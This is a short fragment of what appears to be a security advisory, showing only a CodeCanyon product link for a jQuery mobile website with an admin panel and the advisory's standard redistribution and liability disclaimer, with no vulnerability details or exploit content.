http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358

[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.